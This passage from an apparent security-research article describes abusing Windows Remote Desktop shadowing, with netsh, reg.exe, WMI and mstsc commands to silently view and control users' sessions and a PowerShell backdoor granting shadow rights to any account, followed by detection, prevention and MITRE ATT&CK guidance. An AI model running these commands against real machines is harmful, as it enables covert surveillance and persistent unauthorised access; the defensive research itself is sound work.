For this to work, it is required that the Windows Firewall Remote Management (WFRM) rules have already been enabled on the remote system, otherwise we will simply shift the problem where the WFRM rules need to be enabled, in order to enable the RDP Shadow rule via the GUI. The GUI will simply be empty or show an error if the WFRM rules are disabled.

Query

Launch mmc.exe from the cmd.exe window which contains the appropriate security tokens. Navigate to File -> Add/Remove Snap-In (Ctrl + M) and add the Windows Defender Firewall with Advanced Security snap-in to the console. While adding the snap-in, we specify the Another computer machine name, entering the computer name or IP address you want to shadow. After loading the snap-in, navigate to Inbound Rules and locate Remote Desktop — Shadow (TCP-In).

Configure firewall on remote system using wf.msc

Enable

Simply right click the rule and choose Enable Rule.

Option #3: netsh

Same prerequisites apply as enabling it via the GUI (option 2).

Query

netsh.exe -r MYSERVER advfirewall firewall show rule name="Remote Desktop - Shadow (TCP-In)"

Enable

netsh.exe -r MYSERVER advfirewall firewall set rule name="Remote Desktop - Shadow (TCP-In)" new enable=yes

Cleanup

To clean up, the firewall rule can be disabled again via WMI, GUI or netsh.exe by respectively calling the Disable method, right clicking and disabling the rule or changing the enable parameter to no.

Configure RDP Shadowing

As mentioned before, by default, the user of the remote machine will be informed when someone is attempting to shadow or control their session. In order to silently allow the shadowing session, first the Shadow registry key needs to be configured. The registry of a remote system can be updated using several protocols, depending on the accessible ports and configuration of the services listening on those ports. Our aim is to set the Shadow value in HKLMSoftwarePoliciesMicrosoftWindows NTTerminal Services on the remote machine to 2, which allows us to both view and control the session without the user being informed.

Option #1: reg.exe

If the RemoteRegistry service is enabled on the target host, the following command line can be used:

Query

reg.exe query "\MYSERVERHKLMSoftwarePoliciesMicrosoftWindows NTTerminal Services" /V Shadow

Set

reg.exe add "\MYSERVERHKLMSoftwarePoliciesMicrosoftWindows NTTerminal Services" /V Shadow /T REG_DWORD /D 2 /F

Option #2: WMI

This option requires WMI (135/TCP) or WinRM (5985/TCP or 5986/TCP) to be accessible on the remote host.

Query

Invoke-CimMethod -ClassName StdRegProv -MethodName GetDWORDValue -Arguments @{hDefKey=[uint32]2147483650; sSubKeyName="SoftwarePoliciesMicrosoftWindows NTTerminal Services"; sValueName="Shadow"} -CimSession $s

Set

Invoke-CimMethod -ClassName StdRegProv -MethodName SetDWORDValue -Arguments @{hDefKey=[uint32]2147483650; sSubKeyName="SoftwarePoliciesMicrosoftWindows NTTerminal Services"; sValueName="Shadow"; uValue=[uint32]2} -CimSession $s

Cleanup

The Shadow value in the registry can be reverted either after completing the work on the machine or directly after establishing the connection to the remote machine (see next section). Depending on whether the Shadow value did not exist before or the it had a different value, the value can be reverted to the previous value using the methods described above, updating value 2 to the previous value or deleted using reg.exe or WMI.

reg.exe

reg.exe delete "\MYSERVERHKLMSoftwarePoliciesMicrosoftWindows NTTerminal Services" /V Shadow

WMI

Invoke-CimMethod -ClassName StdRegProv -MethodName DeleteValue -Arguments @{hDefKey=[uint32]2147483650; sSubKeyName="SoftwarePoliciesMicrosoftWindows NTTerminal Services"; sValueName="Shadow"} -CimSession $s

Shadow

After validating and, if needed, configuring the service, firewall rule and shadow policy setting, it is time to start using this functionality to spy on users. For Operating Systems Windows 8.1/Server 2012 R2 and later, the Remote Desktop Connection mstsc.exe tool is used to view a remote session. This tool however, needs to be launched from the command line as the GUI does not provide options to launch a shadowing session. mstsc.exe has a large amount of parameters, but the parameters relevant to shadowing are listed below.

MSTSC [/v:<server[:port]>] /shadow:<sessionID> [/control] [/noConsentPrompt]
Parameter Meaning Notes
/v:<server[:port]> Specifies the remote computer to which you want to connect.  
/shadow:<sessionID> Specifies the sessionID you wish to view. Instead of identifying the session ID as described earlier, it is also relatively easy to guess a session ID, starting with ID 1.
/control Allows control of the session. This requires the Shadow value to be set to 2.
/noConsentPrompt Allows shadowing without user consent. This requires the Shadow value to be set to 2 (or 4).

With the session ID obtained in Query interactive sessions, we can compile the command line to connect to the remote system. Alternatively that step could be skipped and instead the session ID can simply be guessed. Make sure to always include the /noConsentPrompt flag. Even if the Shadow value in the registry is set to not require the user’s permissions, on the client side, we have to explicitly specify that we do not want to ask for permission.

mstsc.exe /v:MYSERVER /shadow:1 /noConsentPrompt

The Remote Desktop Connection tool will now show up and, within seconds, the screen of the remote session will show up. This will be a read-only session where it is possible to observe what the user is doing. If the user becomes inactive and we would like to take control, the existing shadowing session should be closed and the mstsc shadowing one-liner needs to be run again, this time also providing the /control parameter, which will make the command line looks as follows:

mstsc.exe /v:MYSERVER /shadow:1 /noConsentPrompt /control

Because it is possible to have multiple connections on Windows Server, it is also possible to omit the /v parameter and simply specify the remaining parameters to shadow a session on the local machine.

This article is not diving deep into shadowing Windows 7/Server 2008 R2 and prior Operating Systems, but in that case the command line required to start shadowing is shadow.exe 1 /SERVER:MYSERVER, where 1 has to be replaced by the session ID identified in Query interactive sessions. To quit the session, use Ctrl + *, where the asterisk symbol from the numpad needs to be used. If numpad is not available, one can possibly use a function key combination, which for example on my HP laptop is Ctrl + FN + P.

The secure desktop

Whenever the user’s session is locked, or in case the UAC prompt (right click -> Run as Administrator) on the secure desktop is enabled (which it is by default) and the /control flag of mstsc.exe is not used, the shadowing session will turn black and show a pause symbol. After the user respectively logs in or returns from the secure desktop back to the regular desktop, the shadowing session will resume.

Screen shown when session is locked or when UAC prompt on secure desktop is shown
Shadowing session is paused when UAC displays a prompt on the secure desktop.

Screen shown at the console when UAC prompt on secure desktop is shown
Same screen on the console when UAC prompt is shown.

When the /control flag is used for mstsc.exe, the UAC popup is not shown on the secure desktop, regardless of the PromptOnSecureDesktop setting3 in HKLMSOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem.

Shadowing backdoor

For any future access without an administrative account, it is possible to backdoor the shadowing feature. By adding the backdoor it is possible at any future moment to use any limited, non-administrative account to spy on users interactively using the system as well as controlling these sessions. This will also make it possible to escalate privileges through these controlled – possibly – higher-privileged sessions.

Backdooring the shadowing configuration is relatively easy. The following two lines need to be executed to add any user or group to the list of accounts or groups that are allowed to shadow and control a session where the value for AccountName argument can specify any local or domain user:

$tsps = Get-CimInstance -Namespace ROOTCIMV2TerminalServices -ClassName Win32_TSPermissionsSetting -Filter 'TerminalName="RDP-Tcp"' -CimSession $s
$tsps | Invoke-CimMethod -MethodName AddAccount -Arguments @{AccountName="BITSADMINBackdoorAccount"; PermissionPreSet=[uint32]2}

Something to be aware of is that it seems that a user will appear in the quser.exe output (and it is possible to shadow them) only after a new user logged on via RDP. Users currently logged in need to fully logoff first (not just disconnect) and then login again before they can be shadowed using the backdoor account. The list of user accounts and groups that have access to the Terminal Services (either to just query or also to RDP and shadow) can be listed using the following command:

Get-CimInstance -Namespace ROOTCIMV2TerminalServices -ClassName Win32_TSAccount -Filter 'TerminalName="RDP-Tcp"' -CimSession $s

The value of the PermissionsAllowed attribute is a bitmask which represents the constants in the following table4. This value can also be obtained by reading the StringSecurityDescriptor attribute of the RDP-Tcp terminal instance of the Win32_TSPermissionsSetting WMI class.

Value Constant Description
0x00001 WINSTATION_QUERY Permission to query information about a session.
0x00002 WINSTATION_SET Permission to modify connection parameters.
0x00004 WINSTATION_LOGOFF Permission to log off a user from a session.
0xF0008 WINSTATION_VIRTUAL | STANDARD_RIGHTS_REQUIRED Permission to use virtual channels. Virtual channels provide access from a server program to client devices.
0x00010 WINSTATION_SHADOW Permission to shadow or remotely control another user’s session.
0x00020 WINSTATION_LOGON Permission to log on to a session on the server.
0x00040 WINSTATION_RESET Permission to reset or end a session or connection.
0x00080 WINSTATION_MSG Permission to send a message to another user’s session.
0x00100 WINSTATION_CONNECT Permission to connect to another session.
0x00200 WINSTATION_DISCONNECT Permission to disconnect a session.

For example value 983999 which is by default set for the Administrators group translates to hexadecimal value 0xF03BF, which means all of the flags in the table combined except for the WINSTATION_RESET flag.

The user or group added to the configuration is now able to both query which sessions are active, and also shadow and control these sessions. Be aware that, if explicitly configured in the group policies applicable to the machine, the Shadow value in the registry could be reset when the group policy is reapplied. In that case, administrative access is still required to set the Shadow key. In my experience I have not yet seen group policies in which the Shadowing policy is explicitly configured.

This method creates or updates the Security REG_BINARY value in the HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp key. It is also possible to directly create/modify this key via the remote registry or WMI methods described before. An alternative way to create this backdoor is to directly update the DefaultSecurity value in the HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStations key. This value is used in case the Security value of the RDP-Tcp subkey does not exist.

To clean up the backdoor, the following PowerShell commands can be used where the AccountName variable needs to be updated to the user that needs to be removed from the configuration:

$tsacc = Get-CimInstance -Namespace ROOTCIMV2TerminalServices -ClassName Win32_TSAccount -Filter 'TerminalName="RDP-Tcp" And AccountName="BITSADMIN\BackdoorAccount"' -CimSession $s
$tsacc | Invoke-CimMethod -MethodName Delete

Alternatively, it is also possible to revert all permissions to their defaults and remove all additional (backdoor) accounts using the RestoreDefaults method of the RDP-Tcp instance of the Win32_TSPermissionsSetting class:

$tsps = Get-CimInstance -Namespace ROOTCIMV2TerminalServices -ClassName Win32_TSPermissionsSetting -Filter 'TerminalName="RDP-Tcp"' -CimSession $s
$tsps | Invoke-CimMethod -MethodName RestoreDefaults

The cleanup can be validated by again executing the command above, listing the instances of the Win32_TSAccount for the RDP-Tcp terminal.

Defense

The defense section is split into a subsection which details ways to prevent attackers to use the shadowing feature and a subsection which looks into the various ways (ab)use of the shadowing feature can be monitored.

Prevention

In order to prevent spying on users abusing Remote Desktop shadowing, the following settings can be applied:

  • To prevent shadowing altogether, using application whitelisting, it is possible to block the RdpSaUacHelper.exe, RdpSaProxy.exe and RdpSa.exe processes from launching
  • In the group policy, one can explicitly set the Shadow setting to require the user’s consent before shadowing or controlling the session so the backdoor is less effective; this assumes that an attacker at a later moment does not have sufficient privileges anymore to set the Shadow key in the registry to the value of their liking
  • The WINSTATION_SHADOW permission can be removed from all entries in the Win32_TSAccount WMI class, although an attacker with administrative permissions can provide themselves this permission again

Detection

This section outlines some techniques that can be used to detect the use of Remote Desktop shadowing.

Detect creation or changes of the Shadow value

Throw an alert in case the Shadow value in the HKLMSoftwarePoliciesMicrosoftWindows NTTerminal Services key is created or modified.

Detect launching of processes responsible for shadowing

Processes spawn on shadow session connect. The following processes are spawned when a shadowing session to the system is established:

What Spawn #1 Spawn #2 Spawn #3
Process C:Windowssystem32RdpSaUacHelper.exe C:Windowssystem32RdpSaProxy.exe C:Windowssystem32RdpSa.exe
Process description RDP Session Agent UAC Helper RDP Session Agent Proxy RDP Session Agent
Parent C:Windowssystem32svchost.exe -k netsvcs C:Windowssystem32svchost.exe -k DcomLaunch C:Windowssystem32RdpSaProxy.exe
Parent description Remote Desktop Configuration service DCOM Server Process Launcher service RDP Session Agent Proxy

Whenever the RdpSa.exe process is launched under a certain user, that user is being shadowed. Whenever the process stops, the shadowing session ended.

Network

On the network level, certain DCE/RPC packets can be observed when a shadowing session is starting on a host on the network:

Aspect Wireshark filter Notes
In order to make a call to the UUID responsible for initiating the shadowing session, the named pipe SessEnvPublicRpc is opened smb2.filename == "SessEnvPublicRpc" It might be easier to have an IDS looking for clients that access this named pipe name. There might be other (legitimate) uses of this pipe apart from shadowing which I haven’t investigated.
DCE/RPC bind to interface UUID 1257b580-ce2f-4109-82d6-a9459d0bf6bc dcerpc.cn_bind_to_uuid == 1257b580-ce2f-4109-82d6-a9459d0bf6bc This is the UUID of the SessEnv.dll library of the Remote Desktop Configuration (SessionEnv) service. This UUID only exports a single function (opnum 0) with the name RpcShadow2.

Detect backdoor creation

Detect modification of the Remote Desktop settings by monitoring the Security value in the HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp key and the DefaultSecurity value in the HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStations key. Normally, these keys will not be modified, so any modification might point to an attacker weakening the authorizations in the shadowing configuration.

MITRE ATT&CK techniques

In this section, the actions performed to spy and control users’ RDP sessions are mapped to the TTPs of the MITRE ATT&CK framework:

Tactic ID Name Details
Lateral Movement T1550 Use Alternate Authentication Material Uses runas.exe to authenticate as a different user
Discovery T1033 System Owner/User Discovery Queries sessions on the remote machine
Defense Evasion T1112 Modify Registry Configures the Shadow key in the registry
Command And Control T1219 Remote Access Software Interact with an existing user session
Command And Control T1071 Application Layer Protocol RDP shadowing takes place over the SMB protocol
Persistence T1098 Account Manipulation Configures Remote Desktop permissions to allow shadowing by low-privileged users

Troubleshooting

If you are testing Remote Desktop shadowing in your lab setup or using it in a Red Team exercise and encounter any errors, this section contains a list of common errors including the causes and potential fixes.

quser

Error Possible cause
Error 0x00000005 enumerating sessionnames. Error [5]:Access is denied. No permission for the current user, use runas.exe /netonly to spawn quser.exe as a different user which has sufficient authorizations on the remote machine.

mstsc

Error Possible cause
No error, but mstsc window just disappears. The shadow firewall rule is disabled on the remote host. On the network level no packets are being exchanged because the target machine’s firewall is dropping all the packets.
Shadow Error: The Group Policy setting is configured to require the user’s consent. Verify the configuration of the policy setting. The Shadow registry value is not set to 2
Shadow Error: The operator or administrator has refused the request. The /noConsentPrompt parameter has not been provided to the mstsc command line. This means the user on the target system has been presented with the following dialog: Remote Monitoring Request: BITSADMINAdministrator is requesting to view your session remotely. Do you accept the request? Yes / No. Two options: Option 1, the user did not respond to the prompt within 30 seconds. It will then automatically disappear. Option 2, the user clicked the No button.
Shadow Error: The interface is unknown. The Remote Desktop Services (TermService) service on the remote host is not running
Shadow Error: The version of Windows running on this server does not support user shadowing. The target Operating System is Windows 8/Server 2012 or lower and does not support the new implementation of shadowing. Try using the shadow.exe tool which is shipped with Windows 7/Server 2008 R2 and lower.
Access Denied Authentication failed, launch mstsc from a command prompt which has the appropriate security tokens prepared.

Further reading

While finalizing this article, I discovered that similar research has already been performed by Roman Maximov. Our research overlaps in certain parts while it complements in other parts. If you want to read more on this topic, make sure to also check out his interesting blog post here!

References

Понравилась статья? Поделить с друзьями:
  • Shaders error invalid program gbuffers water
  • Shaders error invalid program gbuffers terrain
  • Shaders error invalid program gbuffers skybasic
  • Shaders error invalid program deferred6
  • Shader file error рататуй